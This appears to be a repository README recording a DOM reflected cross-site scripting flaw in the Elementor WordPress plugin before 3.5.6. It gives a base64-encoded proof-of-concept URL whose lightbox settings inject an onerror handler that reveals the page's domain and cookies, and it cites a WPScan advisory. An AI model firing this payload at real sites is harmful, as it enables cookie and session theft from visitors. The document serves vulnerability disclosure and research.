crash.software
Projects
Pull Requests
Issues
Builds
WP-Vulnerabilities-Exploits
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY WP-Vulnerabilities-Exploits Files
🤬
main
..
README.md Loading last commit info...
README.md

Elementor < 3.5.6 - DOM Reflected Cross-Site Scripting

Description
The plugin does not sanitise and escape user input appended to the DOM via malicious Lightbox settings, resulting in a DOM Cross-Site Scripting issue

Proof of Concept

https://example.com/#elementor-action:action=lightbox&settings=ewogICAgInR5cGUiOiAidmlkZW8iLAogICAgInVybCI6ICJodHRwOi8vIiwKICAgICJ2aWRlb1R5cGUiOiAiaG9zdGVkIiwKICAgICJ2aWRlb1BhcmFtcyI6IHsKICAgICAgICAib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbisnICcrZG9jdW1lbnQuY29va2llKSIsCiAgICAgICAgInN0eWxlIjogImJhY2tncm91bmQtY29sb3I6cmVkIgogICAgfQp9

References

https://wpscan.com/vulnerability/9758570b-4729-4eef-ad52-b6e922f536d6

Please wait...
Page is in error, reload to recover